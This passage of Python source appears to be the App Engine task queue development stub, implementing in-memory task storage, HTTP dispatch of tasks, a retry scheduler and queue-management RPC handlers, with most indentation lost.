'queue_name': 'default',
'url': '/update',
'method': 'GET',
'eta': '2009/02/02 05:37:42',
'eta_delta': '0:00:06.342511 ago',
'body': '',
       'headers': [('user-header', 'some-value'),
                   ('X-AppEngine-QueueName', 'update-queue'),
                   ('X-AppEngine-TaskName', 'task-123'),
                   ('X-AppEngine-TaskExecutionCount', '1'),
                   ('X-AppEngine-TaskRetryCount', '1'),
                   ('X-AppEngine-TaskETA', '1234567890.123456'),
                   ('X-AppEngine-Development-Payload', '1'),
                   ('X-AppEngine-TaskPreviousResponse', '300'),
                   ('Content-Length', '0'),
                   ('Content-Type', 'application/octet-stream')]}]
Raises:
ValueError: A task request contains an unknown HTTP method type.
"""
tasks = []
now = datetime.datetime.utcnow()
for _, _, task_response in self._sorted_by_eta:
tasks.append(QueryTasksResponseToDict(
self.queue_name, task_response, now))
return tasks
@_WithLock
def GetTaskAsDict(self, task_name):
"""Gets a specific task from this queue.
Returns:
A dictionary containing one task's attributes. E.g.
      {'name': 'task-123',
'queue_name': 'default',
'url': '/update',
'method': 'GET',
'eta': '2009/02/02 05:37:42',
'eta_delta': '0:00:06.342511 ago',
'body': '',
       'headers': [('user-header', 'some-value'),
                   ('X-AppEngine-QueueName', 'update-queue'),
                   ('X-AppEngine-TaskName', 'task-123'),
                   ('X-AppEngine-TaskExecutionCount', '1'),
                   ('X-AppEngine-TaskRetryCount', '1'),
                   ('X-AppEngine-TaskETA', '1234567890.123456'),
                   ('X-AppEngine-Development-Payload', '1'),
                   ('X-AppEngine-TaskPreviousResponse', '300'),
                   ('Content-Length', '0'),
                   ('Content-Type', 'application/octet-stream')]}
Raises:
ValueError: A task request contains an unknown HTTP method type.
"""
task_responses = self._LookupNoAcquireLock(maximum=1, name=task_name)
if not task_responses:
return
task_response, = task_responses
if task_response.task_name() != task_name:
return
now = datetime.datetime.utcnow()
return QueryTasksResponseToDict(self.queue_name, task_response, now)
@_WithLock
def PurgeQueue(self):
"""Removes all content from the queue."""
self._sorted_by_name = []
self._sorted_by_eta = []
self._sorted_by_tag = []
@_WithLock
def _GetTasks(self):
"""Helper method for tests returning all tasks sorted by eta.
Returns:
A list of taskqueue_service_pb.TaskQueueQueryTasksResponse_Task objects
sorted by eta.
"""
return self._GetTasksNoAcquireLock()
def _GetTasksNoAcquireLock(self):
"""Helper method for tests returning all tasks sorted by eta.
Returns:
A list of taskqueue_service_pb.TaskQueueQueryTasksResponse_Task objects
sorted by eta.
"""
assert self._lock.locked()
tasks = []
for eta, task_name, task in self._sorted_by_eta:
tasks.append(task)
return tasks
def _InsertTask(self, task):
"""Insert a task into the store, keeps lists sorted.
Args:
task: the new task.
"""
assert self._lock.locked()
eta = task.eta_usec()
name = task.task_name()
bisect.insort_left(self._sorted_by_eta, (eta, name, task))
if task.has_tag():
bisect.insort_left(self._sorted_by_tag, (task.tag(), eta, name, task))
bisect.insort_left(self._sorted_by_name, (name, task))
self.task_name_archive.add(name)
@_WithLock
def RunTaskNow(self, task):
"""Change the eta of a task to now.
Args:
      task: The TaskQueueQueryTasksResponse_Task to run now. This must be
stored in this queue (otherwise an AssertionError is raised).
"""
self._PostponeTaskNoAcquireLock(task, 0, increase_retries=False)
@_WithLock
def PostponeTask(self, task, new_eta_usec):
"""Postpone the task to a future time and increment the retry count.
Args:
task: The TaskQueueQueryTasksResponse_Task to postpone. This must be
stored in this queue (otherwise an AssertionError is raised).
      new_eta_usec: The new eta to set on the task. This must be greater than
the current eta on the task.
"""
assert new_eta_usec > task.eta_usec()
self._PostponeTaskNoAcquireLock(task, new_eta_usec)
def _PostponeTaskNoAcquireLock(self, task, new_eta_usec,
increase_retries=True):
assert self._lock.locked()
if increase_retries:
self._IncRetryCount(task)
name = task.task_name()
eta = task.eta_usec()
assert self._RemoveTaskFromIndex(
self._sorted_by_eta, (eta, name, None), task)
if task.has_tag():
assert self._RemoveTaskFromIndex(
self._sorted_by_tag, (task.tag(), eta, name, None), task)
self._PostponeTaskInsertOnly(task, new_eta_usec)
def _PostponeTaskInsertOnly(self, task, new_eta_usec):
assert self._lock.locked()
task.set_eta_usec(new_eta_usec)
name = task.task_name()
bisect.insort_left(self._sorted_by_eta, (new_eta_usec, name, task))
if task.has_tag():
tag = task.tag()
bisect.insort_left(self._sorted_by_tag, (tag, new_eta_usec, name, task))
@_WithLock
def Lookup(self, maximum, name=None, eta=None):
"""Lookup a number of sorted tasks from the store.
If 'eta' is specified, the tasks are looked up in a list sorted by 'eta',
then 'name'. Otherwise they are sorted by 'name'. We need to be able to
sort by 'eta' and 'name' because tasks can have identical eta. If you had
20 tasks with the same ETA, you wouldn't be able to page past them, since
the 'next eta' would give the first one again. Names are unique, though.
Args:
maximum: the maximum number of tasks to return.
name: a task name to start with.
eta: an eta to start with.
Returns:
A list of up to 'maximum' tasks.
Raises:
ValueError: if the task store gets corrupted.
"""
return self._LookupNoAcquireLock(maximum, name, eta)
def _IndexScan(self, index, start_key, end_key=None, max_rows=None):
"""Return the result of a 'scan' over the given index.
The scan is inclusive of start_key and exclusive of end_key. It returns at
most max_rows from the index.
Args:
index: One of the index lists, eg self._sorted_by_tag.
start_key: The key to start at.
end_key: Optional end key.
max_rows: The maximum number of rows to yield.
Returns:
a list of up to 'max_rows' TaskQueueQueryTasksResponse_Task instances from
the given index, in sorted order.
"""
assert self._lock.locked()
start_pos = bisect.bisect_left(index, start_key)
end_pos = INF
if end_key is not None:
end_pos = bisect.bisect_left(index, end_key)
if max_rows is not None:
end_pos = min(end_pos, start_pos + max_rows)
end_pos = min(end_pos, len(index))
tasks = []
for pos in xrange(start_pos, end_pos):
tasks.append(index[pos][-1])
return tasks
def _LookupNoAcquireLock(self, maximum, name=None, eta=None, tag=None):
assert self._lock.locked()
if tag is not None:
return self._IndexScan(self._sorted_by_tag,
start_key=(tag, eta, name,),
end_key=('%s\x00' % tag, None, None,),
max_rows=maximum)
elif eta is not None:
return self._IndexScan(self._sorted_by_eta,
start_key=(eta, name,),
max_rows=maximum)
else:
return self._IndexScan(self._sorted_by_name,
start_key=(name,),
max_rows=maximum)
@_WithLock
def Count(self):
"""Returns the number of tasks in the store."""
return len(self._sorted_by_name)
@_WithLock
def OldestTask(self):
"""Returns the task with the oldest eta in the store."""
if self._sorted_by_eta:
return self._sorted_by_eta[0][2]
return None
@_WithLock
def Oldest(self):
"""Returns the oldest eta in the store, or None if no tasks."""
if self._sorted_by_eta:
return self._sorted_by_eta[0][0]
return None
def _LocateTaskByName(self, task_name):
"""Locate the index of a task in _sorted_by_name list.
If the task does not exist in the list, return None.
Args:
task_name: Name of task to be located.
Returns:
Index of the task in _sorted_by_name list if task exists,
None otherwise.
"""
assert self._lock.locked()
pos = bisect.bisect_left(self._sorted_by_name, (task_name,))
if (pos >= len(self._sorted_by_name) or
self._sorted_by_name[pos][0] != task_name):
return None
return pos
@_WithLock
def Add(self, request, now):
"""Inserts a new task into the store.
Args:
request: A taskqueue_service_pb.TaskQueueAddRequest.
now: A datetime.datetime object containing the current time in UTC.
Raises:
apiproxy_errors.ApplicationError: If a task with the same name is already
in the store, or the task is tombstoned.
"""
if self._LocateTaskByName(request.task_name()) is not None:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.TASK_ALREADY_EXISTS)
if request.task_name() in self.task_name_archive:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_TASK)
now_sec = calendar.timegm(now.utctimetuple())
task = taskqueue_service_pb.TaskQueueQueryTasksResponse_Task()
task.set_task_name(request.task_name())
task.set_eta_usec(request.eta_usec())
task.set_creation_time_usec(_SecToUsec(now_sec))
task.set_retry_count(0)
task.set_method(request.method())
if request.has_url():
task.set_url(request.url())
for keyvalue in request.header_list():
header = task.add_header()
header.set_key(keyvalue.key())
header.set_value(keyvalue.value())
if request.has_description():
task.set_description(request.description())
if request.has_body():
task.set_body(request.body())
if request.has_crontimetable():
task.mutable_crontimetable().set_schedule(
request.crontimetable().schedule())
task.mutable_crontimetable().set_timezone(
request.crontimetable().timezone())
if request.has_retry_parameters():
task.mutable_retry_parameters().CopyFrom(request.retry_parameters())
if request.has_tag():
task.set_tag(request.tag())
self._InsertTask(task)
@_WithLock
def Delete(self, name):
"""Deletes a task from the store by name.
Args:
name: the name of the task to delete.
Returns:
TaskQueueServiceError.UNKNOWN_TASK: if the task is unknown.
TaskQueueServiceError.INTERNAL_ERROR: if the store is corrupted.
      TaskQueueServiceError.TOMBSTONED_TASK: if the task was already deleted.
TaskQueueServiceError.OK: otherwise.
"""
return self._DeleteNoAcquireLock(name)
def _RemoveTaskFromIndex(self, index, index_tuple, task):
"""Remove a task from the specified index.
Args:
index: The index list that needs to be mutated.
index_tuple: The tuple to search for in the index.
task: The task instance that is expected to be stored at this location.
Returns:
True if the task was successfully removed from the index, False otherwise.
"""
assert self._lock.locked()
pos = bisect.bisect_left(index, index_tuple)
if index[pos][-1] is not task:
logging.debug('Expected %s, found %s', task, index[pos][-1])
return False
index.pop(pos)
return True
def _DeleteNoAcquireLock(self, name):
assert self._lock.locked()
pos = self._LocateTaskByName(name)
if pos is None:
if name in self.task_name_archive:
return taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_TASK
else:
return taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_TASK
old_task = self._sorted_by_name.pop(pos)[-1]
eta = old_task.eta_usec()
if not self._RemoveTaskFromIndex(
self._sorted_by_eta, (eta, name, None), old_task):
return taskqueue_service_pb.TaskQueueServiceError.INTERNAL_ERROR
if old_task.has_tag():
tag = old_task.tag()
if not self._RemoveTaskFromIndex(
self._sorted_by_tag, (tag, eta, name, None), old_task):
return taskqueue_service_pb.TaskQueueServiceError.INTERNAL_ERROR
return taskqueue_service_pb.TaskQueueServiceError.OK
@_WithLock
def Populate(self, num_tasks):
"""Populates the store with a number of tasks.
Args:
num_tasks: the number of tasks to insert.
"""
def RandomTask():
"""Creates a new task and randomly populates values."""
assert self._lock.locked()
task = taskqueue_service_pb.TaskQueueQueryTasksResponse_Task()
task.set_task_name(''.join(random.choice(string.ascii_lowercase)
for x in range(20)))
task.set_eta_usec(now_usec + random.randint(_SecToUsec(-10),
_SecToUsec(600)))
task.set_creation_time_usec(min(now_usec, task.eta_usec()) -
random.randint(0, _SecToUsec(20)))
task.set_url(random.choice(['/a', '/b', '/c', '/d']))
if random.random() < 0.2:
task.set_method(
taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.POST)
task.set_body('A' * 2000)
else:
task.set_method(
taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.GET)
retry_count = max(0, random.randint(-10, 5))
task.set_retry_count(retry_count)
task.set_execution_count(retry_count)
if random.random() < 0.3:
random_headers = [('nexus', 'one'),
('foo', 'bar'),
('content-type', 'text/plain'),
('from', 'user@email.com')]
for _ in xrange(random.randint(1, 4)):
elem = random.randint(0, len(random_headers) - 1)
key, value = random_headers.pop(elem)
header_proto = task.add_header()
header_proto.set_key(key)
header_proto.set_value(value)
return task
now_usec = _SecToUsec(time.time())
for _ in range(num_tasks):
self._InsertTask(RandomTask())
class _TaskExecutor(object):
"""Executor for a task object.
Converts a TaskQueueQueryTasksResponse_Task into a http request, then uses the
httplib library to send it to the http server.
"""
def __init__(self, default_host, request_data):
"""Constructor.
Args:
default_host: a string to use as the host/port to connect to if the host
header is not specified in the task.
request_data: A request_info.RequestInfo instance used to look up state
associated with the request that generated an API call.
"""
self._default_host = default_host
self._request_data = request_data
def _HeadersFromTask(self, task, queue):
"""Constructs the http headers for the given task.
This function will remove special headers (values in BUILT_IN_HEADERS) and
add the taskqueue headers.
Args:
task: The task, a TaskQueueQueryTasksResponse_Task instance.
queue: The queue that this task belongs to, an _Queue instance.
Returns:
A list of tuples containing the http header and value. There
      may be multiple entries with the same key.
"""
headers = []
for header in task.header_list():
header_key_lower = header.key().lower()
if header_key_lower == 'host' and queue.target is not None:
headers.append(
(header.key(), '.'.join([queue.target, self._default_host])))
elif header_key_lower not in BUILT_IN_HEADERS:
headers.append((header.key(), header.value()))
headers.append(('X-AppEngine-QueueName', queue.queue_name))
headers.append(('X-AppEngine-TaskName', task.task_name()))
headers.append(('X-AppEngine-TaskRetryCount', str(task.retry_count())))
headers.append(('X-AppEngine-TaskETA',
str(_UsecToSec(task.eta_usec()))))
headers.append(('X-AppEngine-Fake-Is-Admin', '1'))
headers.append(('Content-Length', str(len(task.body()))))
if (task.has_body() and 'content-type' not in
[key.lower() for key, _ in headers]):
headers.append(('Content-Type', 'application/octet-stream'))
headers.append(('X-AppEngine-TaskExecutionCount',
str(task.execution_count())))
if task.has_runlog() and task.runlog().has_response_code():
headers.append(('X-AppEngine-TaskPreviousResponse',
str(task.runlog().response_code())))
return headers
def ExecuteTask(self, task, queue):
"""Construct a http request from the task and dispatch it.
Args:
task: The task to convert to a http request and then send. An instance of
taskqueue_service_pb.TaskQueueQueryTasksResponse_Task
queue: The queue that this task belongs to. An instance of _Queue.
Returns:
Http Response code from the task's execution, 0 if an exception occurred.
"""
method = task.RequestMethod_Name(task.method())
headers = self._HeadersFromTask(task, queue)
dispatcher = self._request_data.get_dispatcher()
try:
response = dispatcher.add_request(method, task.url(), headers,
task.body() if task.has_body() else '',
'0.1.0.2')
except request_info.ModuleDoesNotExistError:
logging.exception('Failed to dispatch task')
return 0
return int(response.status.split(' ', 1)[0])
class _BackgroundTaskScheduler(object):
"""The task scheduler class.
This class is designed to be run in a background thread.
Note: There must not be more than one instance of _BackgroundTaskScheduler per
group.
"""
def __init__(self, group, task_executor, retry_seconds, **kwargs):
"""Constructor.
Args:
group: The group that we will automatically execute tasks from. Must be an
instance of _Group.
task_executor: The class used to convert a task into a http request. Must
be an instance of _TaskExecutor.
retry_seconds: The number of seconds to delay a task by if its execution
fails.
_get_time: a callable that returns the current time in seconds since the
epoch. This argument may only be passed in by keyword. If unset, use
time.time.
"""
self._group = group
self._should_exit = False
self._next_wakeup = INF
self._event = threading.Event()
self._wakeup_lock = threading.Lock()
self.task_executor = task_executor
self.default_retry_seconds = retry_seconds
self._get_time = kwargs.pop('_get_time', time.time)
if kwargs:
raise TypeError('Unknown parameters: %s' % ', '.join(kwargs))
def UpdateNextEventTime(self, next_event_time):
"""Notify the TaskExecutor of the closest event it needs to process.
Args:
next_event_time: The time of the event in seconds since the epoch.
"""
with self._wakeup_lock:
if next_event_time < self._next_wakeup:
self._next_wakeup = next_event_time
self._event.set()
def Shutdown(self):
"""Request this TaskExecutor to exit."""
self._should_exit = True
self._event.set()
def _ProcessQueues(self):
with self._wakeup_lock:
self._next_wakeup = INF
now = self._get_time()
queue, task = self._group.GetNextPushTask()
while task and _UsecToSec(task.eta_usec()) <= now:
if task.retry_count() == 0:
task.set_first_try_usec(_SecToUsec(now))
response_code = self.task_executor.ExecuteTask(task, queue)
if response_code:
task.mutable_runlog().set_response_code(response_code)
else:
logging.error(
          'An error occurred while sending the task "%s" '
'(Url: "%s") in queue "%s". Treating as a task error.',
task.task_name(), task.url(), queue.queue_name)
now = self._get_time()
if 200 <= response_code < 300:
queue.Delete(task.task_name())
else:
retry = Retry(task, queue)
age_usec = _SecToUsec(now) - task.first_try_usec()
if retry.CanRetry(task.retry_count() + 1, age_usec):
retry_usec = retry.CalculateBackoffUsec(task.retry_count() + 1)
logging.warning(
'Task %s failed to execute. This task will retry in %.3f seconds',
task.task_name(), _UsecToSec(retry_usec))
queue.PostponeTask(task, _SecToUsec(now) + retry_usec)
else:
logging.warning(
'Task %s failed to execute. The task has no remaining retries. '
'Failing permanently after %d retries and %d seconds',
task.task_name(), task.retry_count(), _UsecToSec(age_usec))
queue.Delete(task.task_name())
queue, task = self._group.GetNextPushTask()
if task:
with self._wakeup_lock:
eta = _UsecToSec(task.eta_usec())
if eta < self._next_wakeup:
self._next_wakeup = eta
def _Wait(self):
"""Block until we need to process a task or we need to exit."""
now = self._get_time()
while not self._should_exit and self._next_wakeup > now:
timeout = self._next_wakeup - now
self._event.wait(timeout)
self._event.clear()
now = self._get_time()
def MainLoop(self):
"""The main loop of the scheduler."""
while not self._should_exit:
self._ProcessQueues()
self._Wait()
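# Hedged illustration (not part of the original stub): the wake-up pattern used
# by _BackgroundTaskScheduler._Wait above, reduced to a standalone helper. The
# function and argument names here are hypothetical.
def _example_wait_until(event, get_time, next_wakeup, should_exit):
  """Blocks until next_wakeup (seconds since the epoch), an early wake-up, or exit."""
  now = get_time()
  while not should_exit() and next_wakeup > now:
    event.wait(next_wakeup - now)  # returns early if event.set() is called
    event.clear()
    now = get_time()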
class TaskQueueServiceStub(apiproxy_stub.APIProxyStub):
"""Python only task queue service stub.
This stub executes tasks when enabled by using the dev_appserver's AddEvent
capability. When task running is disabled this stub will store tasks for
display on a console, where the user may manually execute the tasks.
"""
def __init__(self,
service_name='taskqueue',
root_path=None,
auto_task_running=False,
task_retry_seconds=30,
_all_queues_valid=False,
default_http_server='localhost',
_testing_validate_state=False,
request_data=None):
"""Constructor.
Args:
service_name: Service name expected for all calls.
root_path: Root path to the directory of the application which may contain
a queue.yaml file. If None, then it's assumed no queue.yaml file is
available.
auto_task_running: When True, the dev_appserver should automatically
run tasks after they are enqueued.
task_retry_seconds: How long to wait between task executions after a
task fails.
_testing_validate_state: Should this stub and all of its _Groups (and
        thus all of its _Queues) validate their state after each
operation? This should only be used during testing of the
taskqueue_stub.
request_data: A request_info.RequestInfo instance used to look up state
associated with the request that generated an API call.
"""
super(TaskQueueServiceStub, self).__init__(
service_name, max_request_size=MAX_REQUEST_SIZE,
request_data=request_data)
self._queues = {}
self._all_queues_valid = _all_queues_valid
self._root_path = root_path
self._testing_validate_state = _testing_validate_state
self._queues[None] = _Group(
self._ParseQueueYaml, app_id=None,
_all_queues_valid=_all_queues_valid,
_update_newest_eta=self._UpdateNextEventTime,
_testing_validate_state=self._testing_validate_state)
self._auto_task_running = auto_task_running
self._started = False
self._task_scheduler = _BackgroundTaskScheduler(
self._queues[None], _TaskExecutor(default_http_server,
self.request_data),
retry_seconds=task_retry_seconds)
self._yaml_last_modified = None
def StartBackgroundExecution(self):
"""Start automatic task execution."""
if not self._started and self._auto_task_running:
task_scheduler_thread = threading.Thread(
target=self._task_scheduler.MainLoop)
task_scheduler_thread.setDaemon(True)
task_scheduler_thread.start()
self._started = True
def Shutdown(self):
"""Requests the task scheduler to shutdown."""
self._task_scheduler.Shutdown()
def _ParseQueueYaml(self):
"""Loads the queue.yaml file and parses it.
Returns:
None if queue.yaml doesn't exist, otherwise a queueinfo.QueueEntry object
populated from the queue.yaml.
"""
if hasattr(self, 'queue_yaml_parser'):
return self.queue_yaml_parser(self._root_path)
if self._root_path is None:
return None
for queueyaml in (
'queue.yaml', 'queue.yml',
os.path.join('WEB-INF', 'appengine-generated', 'queue.yaml')):
try:
path = os.path.join(self._root_path, queueyaml)
modified = os.stat(path).st_mtime
if self._yaml_last_modified and self._yaml_last_modified == modified:
return self._last_queue_info
fh = open(path, 'r')
except (IOError, OSError):
continue
try:
queue_info = queueinfo.LoadSingleQueue(fh)
self._last_queue_info = queue_info
self._yaml_last_modified = modified
return queue_info
finally:
fh.close()
return None
def _UpdateNextEventTime(self, callback_time):
"""Enqueue a task to be automatically scheduled.
Note: If auto task running is disabled, this function is a no-op.
Args:
callback_time: The earliest time this task may be run, in seconds since
the epoch.
"""
self._task_scheduler.UpdateNextEventTime(callback_time)
def _GetGroup(self, app_id=None):
"""Get the _Group instance for app_id, creating a new one if needed.
Args:
app_id: The app id in question. Note: This field is not validated.
"""
if app_id not in self._queues:
self._queues[app_id] = _Group(
app_id=app_id, _all_queues_valid=self._all_queues_valid,
_testing_validate_state=self._testing_validate_state)
return self._queues[app_id]
def _Dynamic_Add(self, request, response):
"""Add a single task to a queue.
This method is a wrapper around the BulkAdd RPC request.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: The taskqueue_service_pb.TaskQueueAddRequest. See
taskqueue_service.proto.
response: The taskqueue_service_pb.TaskQueueAddResponse. See
taskqueue_service.proto.
"""
bulk_request = taskqueue_service_pb.TaskQueueBulkAddRequest()
bulk_response = taskqueue_service_pb.TaskQueueBulkAddResponse()
bulk_request.add_add_request().CopyFrom(request)
self._Dynamic_BulkAdd(bulk_request, bulk_response)
assert bulk_response.taskresult_size() == 1
result = bulk_response.taskresult(0).result()
if result != taskqueue_service_pb.TaskQueueServiceError.OK:
raise apiproxy_errors.ApplicationError(result)
elif bulk_response.taskresult(0).has_chosen_task_name():
response.set_chosen_task_name(
bulk_response.taskresult(0).chosen_task_name())
def _Dynamic_BulkAdd(self, request, response):
"""Add many tasks to a queue using a single request.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: The taskqueue_service_pb.TaskQueueBulkAddRequest. See
taskqueue_service.proto.
response: The taskqueue_service_pb.TaskQueueBulkAddResponse. See
taskqueue_service.proto.
"""
assert request.add_request_size(), 'taskqueue should prevent empty requests'
self._GetGroup(_GetAppId(request.add_request(0))).BulkAdd_Rpc(
request, response)
def GetQueues(self):
"""Gets all the application's queues.
Returns:
A list of dictionaries, where each dictionary contains one queue's
attributes. E.g.:
[{'name': 'some-queue',
'max_rate': '1/s',
'bucket_size': 5,
'oldest_task': '2009/02/02 05:37:42',
'eta_delta': '0:00:06.342511 ago',
'tasks_in_queue': 12}, ...]
The list of queues always includes the default queue.
"""
return self._GetGroup().GetQueuesAsDicts()
def GetTasks(self, queue_name):
"""Gets a queue's tasks.
Args:
queue_name: Queue's name to return tasks for.
Returns:
A list of dictionaries, where each dictionary contains one task's
attributes. E.g.
        [{'name': 'task-123',
          'queue_name': 'default',
          'url': '/update',
          'method': 'GET',
          'eta': '2009/02/02 05:37:42',
          'eta_delta': '0:00:06.342511 ago',
          'body': '',
          'headers': [('user-header', 'some-value'),
                      ('X-AppEngine-QueueName', 'update-queue'),
                      ('X-AppEngine-TaskName', 'task-123'),
                      ('X-AppEngine-TaskRetryCount', '0'),
                      ('X-AppEngine-TaskETA', '1234567890.123456'),
                      ('X-AppEngine-Development-Payload', '1'),
                      ('Content-Length', '0'),
                      ('Content-Type', 'application/octet-stream')]}, ...]
Raises:
ValueError: A task request contains an unknown HTTP method type.
KeyError: An invalid queue name was specified.
"""
return self._GetGroup().GetQueue(queue_name).GetTasksAsDicts()
def DeleteTask(self, queue_name, task_name):
"""Deletes a task from a queue, without leaving a tombstone.
Args:
queue_name: the name of the queue to delete the task from.
task_name: the name of the task to delete.
"""
if self._GetGroup().HasQueue(queue_name):
queue = self._GetGroup().GetQueue(queue_name)
queue.Delete(task_name)
queue.task_name_archive.discard(task_name)
def FlushQueue(self, queue_name):
"""Removes all tasks from a queue, without leaving tombstones.
Args:
queue_name: the name of the queue to remove tasks from.
"""
if self._GetGroup().HasQueue(queue_name):
self._GetGroup().GetQueue(queue_name).PurgeQueue()
self._GetGroup().GetQueue(queue_name).task_name_archive.clear()
def _Dynamic_UpdateQueue(self, request, unused_response):
"""Local implementation of the UpdateQueue RPC in TaskQueueService.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueUpdateQueueRequest.
unused_response: A taskqueue_service_pb.TaskQueueUpdateQueueResponse.
Not used.
"""
self._GetGroup(_GetAppId(request)).UpdateQueue_Rpc(request, unused_response)
def _Dynamic_FetchQueues(self, request, response):
"""Local implementation of the FetchQueues RPC in TaskQueueService.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueFetchQueuesRequest.
response: A taskqueue_service_pb.TaskQueueFetchQueuesResponse.
"""
self._GetGroup(_GetAppId(request)).FetchQueues_Rpc(request, response)
def _Dynamic_FetchQueueStats(self, request, response):
"""Local 'random' implementation of the TaskQueueService.FetchQueueStats.
    This implementation loads some stats from the task store and fills in the
    rest with random numbers.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueFetchQueueStatsRequest.
response: A taskqueue_service_pb.TaskQueueFetchQueueStatsResponse.
"""
self._GetGroup(_GetAppId(request)).FetchQueueStats_Rpc(request, response)
def _Dynamic_QueryTasks(self, request, response):
"""Local implementation of the TaskQueueService.QueryTasks RPC.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryTasksResponse.
"""
self._GetGroup(_GetAppId(request)).QueryTasks_Rpc(request, response)
def _Dynamic_FetchTask(self, request, response):
"""Local implementation of the TaskQueueService.FetchTask RPC.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueFetchTaskRequest.
response: A taskqueue_service_pb.TaskQueueFetchTaskResponse.
"""
self._GetGroup(_GetAppId(request)).FetchTask_Rpc(request, response)
def _Dynamic_Delete(self, request, response):
"""Local delete implementation of TaskQueueService.Delete.
    Deletes tasks from the task store. There is a 1/20 chance of a transient error.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueDeleteRequest.
response: A taskqueue_service_pb.TaskQueueDeleteResponse.
"""
self._GetGroup(_GetAppId(request)).Delete_Rpc(request, response)
def _Dynamic_ForceRun(self, request, response):
"""Local force run implementation of TaskQueueService.ForceRun.
Forces running of a task in a queue. This will fail randomly for testing if
the app id is non-empty.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueForceRunRequest.
response: A taskqueue_service_pb.TaskQueueForceRunResponse.
"""
if _GetAppId(request) is not None:
if random.random() <= 0.05:
response.set_result(
taskqueue_service_pb.TaskQueueServiceError.TRANSIENT_ERROR)
elif random.random() <= 0.052:
response.set_result(
taskqueue_service_pb.TaskQueueServiceError.INTERNAL_ERROR)
else:
response.set_result(
taskqueue_service_pb.TaskQueueServiceError.OK)
else:
group = self._GetGroup(None)
if not group.HasQueue(request.queue_name()):
response.set_result(
taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE)
return
queue = group.GetQueue(request.queue_name())
task = queue.Lookup(1, name=request.task_name())
if not task:
response.set_result(
taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_TASK)
return
queue.RunTaskNow(task[0])
self._UpdateNextEventTime(0)
response.set_result(
taskqueue_service_pb.TaskQueueServiceError.OK)
def _Dynamic_DeleteQueue(self, request, response):
"""Local delete implementation of TaskQueueService.DeleteQueue.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueDeleteQueueRequest.
response: A taskqueue_service_pb.TaskQueueDeleteQueueResponse.
"""
app_id = _GetAppId(request)
if app_id is None:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED)
self._GetGroup(app_id).DeleteQueue_Rpc(request, response)
def _Dynamic_PauseQueue(self, request, response):
"""Local pause implementation of TaskQueueService.PauseQueue.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueuePauseQueueRequest.
response: A taskqueue_service_pb.TaskQueuePauseQueueResponse.
"""
app_id = _GetAppId(request)
if app_id is None:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED)
self._GetGroup(app_id).PauseQueue_Rpc(request, response)
def _Dynamic_PurgeQueue(self, request, response):
"""Local purge implementation of TaskQueueService.PurgeQueue.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueuePurgeQueueRequest.
response: A taskqueue_service_pb.TaskQueuePurgeQueueResponse.
"""
self._GetGroup(_GetAppId(request)).PurgeQueue_Rpc(request, response)
def _Dynamic_DeleteGroup(self, request, response):
"""Local delete implementation of TaskQueueService.DeleteGroup.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueDeleteGroupRequest.
response: A taskqueue_service_pb.TaskQueueDeleteGroupResponse.
"""
app_id = _GetAppId(request)
if app_id is None:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED)
if app_id in self._queues:
del self._queues[app_id]
else:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE)
def _Dynamic_UpdateStorageLimit(self, request, response):
"""Local implementation of TaskQueueService.UpdateStorageLimit.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueUpdateStorageLimitRequest.
response: A taskqueue_service_pb.TaskQueueUpdateStorageLimitResponse.
"""
if _GetAppId(request) is None:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED)
if request.limit() < 0 or request.limit() > 1000 * (1024 ** 4):
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST)
response.set_new_limit(request.limit())
def _Dynamic_QueryAndOwnTasks(self, request, response):
"""Local implementation of TaskQueueService.QueryAndOwnTasks.
